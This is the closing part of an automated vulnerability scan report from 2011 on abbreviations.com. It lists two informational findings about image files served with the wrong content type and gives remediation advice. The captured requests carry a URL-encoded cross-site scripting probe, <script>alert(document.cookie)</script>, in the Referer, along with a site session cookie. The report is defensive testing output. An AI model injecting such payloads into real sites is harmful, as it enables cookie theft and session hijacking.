If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


5.1. http://www.abbreviations.com/images/goog.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.abbreviations.com
Path:   /images/goog.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/goog.jpg HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: image/jpeg
Last-Modified: Mon, 13 Oct 2008 04:03:16 GMT
Accept-Ranges: bytes
ETag: "a01ac19ee82cc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 21:08:31 GMT
Content-Length: 960

GIF89a..........X._....81.../w...H;k......LM[......'....oj.sf...u.v........yY...........8.?.j]-.;...n...|.....M...W.......}..........gLf|.r{.....=%........~Tp.w..Jv...........v`y..~..........y..0..;.
...[SNIP]...

5.2. http://www.abbreviations.com/images/t.gif  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.abbreviations.com
Path:   /images/t.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/t.gif HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: image/gif
Last-Modified: Tue, 18 Jan 2011 14:55:23 GMT
Accept-Ranges: bytes
ETag: "a0c2ecbb1fb7cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 21:08:32 GMT
Content-Length: 297

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.%...B....LH.>...b.(..7..Gb\.....4....!..`.`.....!.'....|.T.$~..... ..Pg...7.y.....P..@...3.y.$.....$E    ...d.B.@t
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Tue Jan 25 11:20:04 CST 2011.